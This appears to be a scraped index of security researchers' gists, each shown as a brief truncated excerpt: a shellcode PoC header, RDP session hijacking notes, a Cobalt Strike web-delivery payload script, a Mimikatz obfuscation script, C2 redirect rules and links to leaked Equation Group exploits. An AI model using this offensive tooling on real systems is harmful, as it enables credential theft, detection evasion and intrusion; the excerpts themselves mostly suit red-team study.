zznop

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;
;;; Copyright (C), zznop, [email protected]
;;;
;;; This software may be modified and distributed under the terms
;;; of the MIT license.  See the LICENSE file for details.
;;;
;;; DESCRIPTION
;;;
;;; This PoC shellcode is meant to be compiled as a blob and prepended to a ELF

bohops

RDP Eavesdropping and Hijacking
*******************************
I spent some time this evening looking at ways to eavesdrop and hijack RDP sessions.  Here is a gist of (semi) interesting findings
that is not very new...

===========
Inspiration
===========
As you may already know...

N3mes1s

### ref: https://twitter.com/dez_/status/986614411711442944

Write-Host "Current Pid: " $Pid
(Get-Process -Id $pid).priorityclass = "RealTime"
$Query = 'SELECT * FROM __InstanceCreationEvent WITHIN 0.0001 WHERE TargetInstance ISA "Win32_Process"'

$action = {
    $e = $Event.SourceEventArgs.NewEvent.TargetInstance    
    $fmt = 'ProcessStarted: (ID={0,5}, Parent={1,5}, cmdline={2}, ExecutablePath="{3}, Name={4}")'
    $msg = $fmt -f $e.ProcessId, $e.ParentProcessId, $e.CommandLine, $e.ExecutablePath, $e.Name                  

rsmudge

# demonstrate how to add a popup handler to a Swing component in Sleep

import java.awt.*;

import javax.swing.*;
import javax.swing.event.*;

# safely add a listener to show a popup
sub setupPopupMenu {
	# we're using fork({}) to run this in a separate Aggressor Script environment.

infosecn1nja

#!/bin/bash

if [[ $# -le 1 ]] ; then
    echo './obfuscate-mimikatz.sh Invoke-Mimikatz.ps1 newfile.ps1'
    exit 1
fi

randstr(){< /dev/urandom tr -dc a-zA-Z0-9 | head -c${1:-8};}

cp $1 $2

chokepoint

#!/usr/bin/env python3

import censys.certificates
import censys.ipv4
from sys import argv

UID = "**CHANGE**"
SECRET = "**CHANGE**"

def is_cloudflare(dn):

curi0usJack

	# 
	# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
	#
	# Note this version requires Apache 2.4+
	#
	# Save this file into something like /etc/apache2/redirect.rules.
	# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom
	# 
	# Include /etc/apache2/redirect.rules
	#

bontchev

Links describing the leaked EQ Group tools for Windows

Repositories and ports

• Lost in Translation - A repository of the leaked tools

• MS17-010 - Port of some of the exploits to Windows 10

Installation and usage guides

lanmaster53

# Moved to https://github.com/lanmaster53/pyscripter-er/tree/master/snippets

rsmudge

# Python Stageless Scripted Web Delivery

# setup our stageless Python Web Delivery attack
sub setup_attack {
	local('%options $x86payload $x64payload $url $script');
	%options = $3;

	# generate our stageless x86 payload
	artifact_stageless(%options["listener"], "raw", "x86", $null, $this);
	yield;